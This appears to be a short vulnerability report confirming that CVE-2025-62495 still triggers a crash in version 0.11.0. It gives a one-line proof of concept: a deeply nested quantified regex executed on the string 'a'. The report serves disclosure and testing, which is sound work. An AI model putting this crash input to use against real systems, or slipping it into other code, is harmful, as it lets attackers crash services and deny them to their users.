Hello,
I was able to reproduce a crash when testing CVE-2025-62495 on version 0.11.0.
Reproduction
/(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:(?:a|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+|)+/.exec("a");
References
CVE-2025-62495 @ nvd.nist.gov
Google issue tracker original report